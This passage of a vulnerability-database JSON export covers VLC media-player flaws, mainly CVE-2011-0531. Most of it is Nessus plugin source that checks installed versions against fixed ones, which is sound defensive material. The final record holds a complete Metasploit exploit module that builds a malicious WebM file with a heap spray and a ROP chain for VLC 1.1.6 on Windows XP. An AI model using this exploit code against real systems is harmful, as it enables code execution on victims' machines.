attribute:\"description\",\n value:\n\"The version of VLC media player installed on the remote host is\nearlier than 1.1.7. Such versions are reportedly affected by the\nfollowing vulnerability :\n\n - Insufficient input validation when parsing a specially\n crafted Matroska or WebM (MKV) file can be exploited to\n execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.videolan.org/security/sa1102.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.videolan.org/developers/vlc-branch/NEWS\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to VLC Media Player version 1.1.7 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VideoLAN VLC MKV Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:videolan:vlc_media_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vlc_installed.nasl\");\n script_require_keys(\"SMB/VLC/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/VLC/Version\");\n\n# nb: 'version' may look like '0.9.8a'!\nif (\n version =~ \"^0\\.\" ||\n version =~ \"^1\\.0\\.\" ||\n version =~ \"^1\\.1\\.[0-6]($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item(\"SMB/VLC/File\");\n if (isnull(path)) path = \"n/a\";\n else path = ereg_replace(pattern:\"^(.+)\\\\[^\\\\]+$\", replace:\"\\1\", string:path);\n\n report = \n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.1.7\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n\n exit(0);\n}\nelse exit(0, \"The host is not affected since VLC \"+version+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:46:15", "description": "Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.", "edition": 17, "published": "2011-02-11T00:00:00", "title": "Debian DSA-2159-1 : vlc - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "modified": "2011-02-11T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:vlc"], "id": "DEBIAN_DSA-2159.NASL", "href": "https://www.tenable.com/plugins/nessus/51946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2159. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51946);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_xref(name:\"DSA\", value:\"2159\");\n\n script_name(english:\"Debian DSA-2159-1 : vlc - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/vlc\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2159\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the vlc packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VideoLAN VLC MKV Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libvlc-dev\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlc5\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore-dev\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore4\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mozilla-plugin-vlc\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-data\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-dbg\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-nox\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-fluidsynth\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-ggi\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-jack\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-notify\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-pulse\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-sdl\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svg\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svgalib\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-zvbi\", reference:\"1.1.3-1squeeze3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:46:26", "description": "Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and streamer, could lead to the execution of\narbitrary code if a user is tricked into opening a malformed media\nfile.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159(CVE-2010-0522,\nCVE-2010-1441, CVE-2010-1442 and CVE-2011-0531 ).", "edition": 16, "published": "2011-04-07T00:00:00", "title": "Debian DSA-2211-1 : vlc - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", "CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "modified": "2011-04-07T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:vlc"], "id": "DEBIAN_DSA-2211.NASL", "href": "https://www.tenable.com/plugins/nessus/53304", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2211. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53304);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-3275\", \"CVE-2010-3276\");\n script_bugtraq_id(47012);\n script_xref(name:\"DSA\", value:\"2211\");\n\n script_name(english:\"Debian DSA-2211-1 : vlc - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and streamer, could lead to the execution of\narbitrary code if a user is tricked into opening a malformed media\nfile.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159(CVE-2010-0522,\nCVE-2010-1441, CVE-2010-1442 and CVE-2011-0531 ).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0522\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1441\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1442\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-0531\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/vlc\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2211\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the vlc packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC AMV Dangling Pointer Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"vlc\", reference:\"0.8.6.h-4+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlc-dev\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlc5\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore-dev\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore4\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mozilla-plugin-vlc\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-data\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-dbg\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-nox\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-fluidsynth\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-ggi\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-jack\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-notify\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-pulse\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-sdl\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svg\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svgalib\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-zvbi\", reference:\"1.1.3-1squeeze4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:56:25", "description": "The remote host is affected by the vulnerability described in GLSA-201411-01\n(VLC: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VLC. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file using VLC, possibly resulting in execution of arbitrary code with\n the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 20, "published": "2014-11-06T00:00:00", "title": "GLSA-201411-01 : VLC: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1684", "CVE-2011-0522", "CVE-2012-3377", "CVE-2011-2194", "CVE-2013-1954", "CVE-2010-3124", "CVE-2011-0531", "CVE-2010-1441", "CVE-2012-1775", "CVE-2011-2588", "CVE-2013-1868", "CVE-2010-3275", "CVE-2010-1442", "CVE-2013-6283", "CVE-2011-3623", "CVE-2010-3907", "CVE-2010-2937", "CVE-2011-0021", "CVE-2012-2396", "CVE-2011-1087", "CVE-2013-6934", "CVE-2012-0023", "CVE-2012-5855", "CVE-2012-5470", "CVE-2010-1443", "CVE-2013-4388", "CVE-2012-1776", "CVE-2010-3276", "CVE-2010-1445", "CVE-2013-3245", "CVE-2011-2587", "CVE-2010-1444", "CVE-2010-2062"], "modified": "2014-11-06T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:vlc"], "id": "GENTOO_GLSA-201411-01.NASL", "href": "https://www.tenable.com/plugins/nessus/78879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201411-01.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78879);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1441\", \"CVE-2010-1442\", \"CVE-2010-1443\", \"CVE-2010-1444\", \"CVE-2010-1445\", \"CVE-2010-2062\", \"CVE-2010-2937\", \"CVE-2010-3124\", \"CVE-2010-3275\", \"CVE-2010-3276\", \"CVE-2010-3907\", \"CVE-2011-0021\", \"CVE-2011-0522\", \"CVE-2011-0531\", \"CVE-2011-1087\", \"CVE-2011-1684\", \"CVE-2011-2194\", \"CVE-2011-2587\", \"CVE-2011-2588\", \"CVE-2011-3623\", \"CVE-2012-0023\", \"CVE-2012-1775\", \"CVE-2012-1776\", \"CVE-2012-2396\", \"CVE-2012-3377\", \"CVE-2012-5470\", \"CVE-2012-5855\", \"CVE-2013-1868\", \"CVE-2013-1954\", \"CVE-2013-3245\", \"CVE-2013-4388\", \"CVE-2013-6283\", \"CVE-2013-6934\");\n script_bugtraq_id(42386, 45632, 45927, 46008, 46060, 47012, 47293, 48171, 48664, 51231, 52550, 53391, 53535, 54345, 55850, 57079, 57333, 61032, 61844, 62724, 65139);\n script_xref(name:\"GLSA\", value:\"201411-01\");\n\n script_name(english:\"GLSA-201411-01 : VLC: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201411-01\n(VLC: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VLC. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file using VLC, possibly resulting in execution of arbitrary code with\n the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201411-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All VLC users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/vlc-2.1.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC MMS Stream Handling Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/vlc\", unaffected:make_list(\"ge 2.1.2\"), vulnerable:make_list(\"lt 2.1.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VLC\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-12T20:03:17", "description": "This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it.\n", "published": "2011-02-03T18:16:40", "type": "metasploit", "title": "VideoLAN VLC MKV Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_WEBM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VideoLAN VLC MKV Memory Corruption',\n 'Description' => %q{\n This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Dan Rosenberg' ],\n 'References' =>\n [\n [ 'OSVDB', '70698' ],\n [ 'CVE', '2011-0531' ],\n [ 'BID', '46060' ],\n [ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],\n [ 'URL', 'http://www.videolan.org/security/sa1102.html' ]\n ],\n 'Payload' =>\n {\n 'Space'\t\t=> 1024,\n 'DisableNops'\t=> true,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'VLC 1.1.6 on Windows XP SP3',\n {\n 'SprayTarget' => 0x030b030a,\n 'Ret' => 0x6ce091b5,\t\t# Pointer to SprayTarget\n 'Base' => 0x6cd00000,\t\t# Base of libtaglib_plugin.dll\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 31 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.webm']),\n ])\n end\n\n def exploit\n\n rop_base = target[\"Base\"]\n spray = target[\"SprayTarget\"]\n\n # EBML Header\n file = \"\\x1A\\x45\\xDF\\xA3\"\t# EBML\n file << \"\\x01\\x00\\x00\\x00\"\n file << \"\\x00\\x00\\x00\\x1F\"\n file << \"\\x42\\x86\\x81\\x01\"\t# EBMLVersion = 1\n file << \"\\x42\\xF7\\x81\\x01\"\t# EBMLReadVersion = 1\n file << \"\\x42\\xF2\\x81\\x04\"\t# EBMLMaxIDLength = 4\n file << \"\\x42\\xF3\\x81\\x08\"\t# EBMLMaxSizeLength = 8\n file << \"\\x42\\x82\\x84\\x77\"\t# DocType = \"webm\"\n file << \"\\x65\\x62\\x6D\"\n file << \"\\x42\\x87\\x81\\x02\"\t# DocTypeVersion = 2\n file << \"\\x42\\x85\\x81\\x02\"\t# DocTypeReadVersion = 2\n\n # Segment data\n file << \"\\x18\\x53\\x80\\x67\"\t# (0) Segment\n file << \"\\x01\\x00\\x00\\x00\"\n file << \"\\x01\\xD6\\x22\\xF1\"\n\n # Seek data\n file << \"\\x11\\x4D\\x9B\\x74\"\t# (1) SeekHead\n file << \"\\x40\\x3F\"\n\n file << \"\\x4D\\xBB\\x8B\"\t\t# (2) Seek\n file << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Segment Info\n file << \"\\x15\\x49\\xA9\\x66\"\t#\n\n file << \"\\x53\\xAC\\x81\"\t\t# (3) SeekPosition\n file << \"\\xff\"\t\t\t# \tindex of segment info\n\n # Trigger the bug with an out-of-order element\n file << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Tracks\n file << \"\\x16\\x54\\xAE\\x6B\"\t#\n\n file << \"\\x42\" * 228 \t\t# Padding\n\n # Data\n file << \"\\x15\\x49\\xA9\\x66\"\t# (1) Segment Info\n file << \"\\x01\\x00\\x00\\x00\"\t#\n file << \"\\x01\\xff\\xff\\xff\"\t# This triggers our heap spray...\n file << [target.ret].pack('V')\t# Pointer to our heap spray\n\n # The alignment plays nice, so EIP will always\n # hit our pivot when our heapspray works. ESI contains\n # 0x030b030a, which will point to one of our \"pop; retn\"\n # pointers, so this works as both a pivot and NOPsled\n block = [\n rop_base + 0x229a5,\t\t# xcgh esi,esp; retn\n rop_base + 0x2c283,\t\t# pop eax; retn\n 0xdeadbeef,\t\t\t# pad\n rop_base + 0x2c283,\t\t# pop eax; retn\n ]\n block = block.pack('V*')\n\n # ROP payload\n rop = [\n rop_base + 0x1022,\t\t# retn\n\n # Call VirtualProtect()\n rop_base + 0x2c283,\t\t# pop eax; retn\n rop_base + 0x1212a4,\t\t# IAT entry for VirtualProtect -> eax\n rop_base + 0x12fda,\t\t# mov eax,DWORD PTR [eax]\n rop_base + 0x29d13,\t\t# jmp eax\n\n rop_base + 0x1022,\t\t# retn\n spray & ~0xfff,\t\t\t# lpAddress\n 0x60000,\t\t\t# dwSize\n 0x40,\t\t\t\t# flNewProtect\n spray - 0x1000,\t\t\t# lpfOldProtect\n\n # Enough of this ROP business...\n rop_base + 0xdace8 # push esp; retn\n ]\n rop = rop.pack('V*')\n\n # Overwrite the bad pointer with the address of an infinite\n # loop so the other threads spin instead of crashing\n rop << \"\\xc7\\x05\"\n rop << [spray + 0xc].pack('V')\n rop << [rop_base + 0x1c070].pack('V')\t# mov DWORD PTR ds:[ptr],&loop\n\n # Restore the stack\n rop << \"\\x87\\xe6\"\t\t\t# xchg esi,esp\n\n # Payload\n rop << payload.encoded\n\n # We need to be 16-byte aligned\n rop << \"\\xcc\" * (16 - rop.length % 16)\n\n # Heapspray and payload, go!\n 32.times {\n 0x3000.times {\n file << block\n }\n file << rop\n }\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(file)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": 